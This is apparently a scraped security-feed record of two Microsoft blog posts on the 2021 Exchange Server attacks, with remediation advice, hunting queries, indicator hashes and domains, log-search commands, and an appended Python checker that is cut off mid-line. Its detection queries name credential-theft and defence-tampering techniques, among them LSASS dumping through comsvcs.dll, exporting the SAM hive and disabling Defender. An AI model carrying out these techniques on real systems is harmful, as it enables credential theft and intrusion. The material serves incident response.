By utilizing \"malwareless\" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users, for changes, and ensure all users require a password for sign-in. 
New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. 
Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like [Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Use Group Policy to prevent privileged accounts like domain admins from signing into member servers and workstations, limiting credential exposure and lateral movement.\n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * 
[Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * 
Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. 
Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions**\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where 
InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems suspected of being compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence**\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft**\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. 
The results of the following query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for modification of the WDigest UseLogonCredential registry value; setting it to 1 makes LSASS keep plaintext credentials in memory.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM Services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the Security Account Manager (SAM) or SECURITY hives being saved, from which credentials can later be extracted offline.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here; the threats may use files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web 
shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * 
a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-25T21:21:07", "type": "mssecure", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:09:16", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. 
This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. 
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. 
It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. 
Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. 
One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. 
We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script that runs the HAFNIUM IOC checks below in a single pass over the logs, written to address the performance and memory cost of the one-line commands on large log sets. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the Exchange HttpProxy logs: \n   * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n   * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern ServerInfo~*/* \n   * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n   * The command matches on the AnchorMailbox and BackEndCookie patterns alone; confirm that AuthenticatedUser is empty on the rows it returns before treating them as exploitation. It also reads every HttpProxy log into memory at once, which is slow on a busy server.\n   * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions 
were taken. \n   * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n   * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n   * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n   * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n   * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n   * Exploitation of this deserialization bug will create Application events with the following properties: \n   * Source: MSExchange Unified Messaging\n   * EntryType: Error\n   * Event Message Contains: System.InvalidCastException\n   * The following PowerShell command queries the Application event log for these entries (Get-EventLog exists only in Windows PowerShell 5.1; on PowerShell 7 use Get-WinEvent with an equivalent filter):\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n   * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid URIs.\n\n   * The following PowerShell command searches for _potential_ exploitation; every match needs manual review, since legitimate virtual directory changes are logged the same way:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. 
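The three file-based checks above (HttpProxy, OABGeneratorLog and ECP\Server) as offline Python that can be run over logs copied off a server, shown here as an added example rather than code from the Microsoft post. It relies only on the field names and message substrings the text documents; the log snippets inside it are constructed to those shapes, not real Exchange output, and the HttpProxy check additionally requires AuthenticatedUser to be empty, which the Import-Csv one-liner does not enforce.

```python
"""Offline checks for the Exchange log indicators described above.

Added example, not code from the Microsoft post: three of the log checks
(HttpProxy, OABGeneratorLog, ECP\\Server) in Python for logs copied off a server.
Only the documented field names and message substrings are relied on; the
snippets at the bottom are constructed to those shapes, not real Exchange output.
"""
import csv
import fnmatch
import io
import re
from urllib.parse import urlparse

OAB_TEMP = "\\clientaccess\\oab\\temp\\"  # the only place OAB downloads should land

def read_exchange_csv(text):
    """Exchange CSV logs open with '#Software'/'#Fields' comment lines; skip them."""
    rows = [ln for ln in text.splitlines() if ln and not ln.startswith("#")]
    return list(csv.DictReader(io.StringIO("\n".join(rows))))

def httpproxy_hits(text):
    """CVE-2021-26855: request routed via a ServerInfo~ anchor with no authenticated user.

    Unlike the Import-Csv one-liner, this also requires AuthenticatedUser to be empty."""
    hits = []
    for row in read_exchange_csv(text):
        anchor = row.get("AnchorMailbox", "").lower()
        cookie = row.get("BackEndCookie", "").lower()
        routed = (fnmatch.fnmatchcase(anchor, "serverinfo~*/*")
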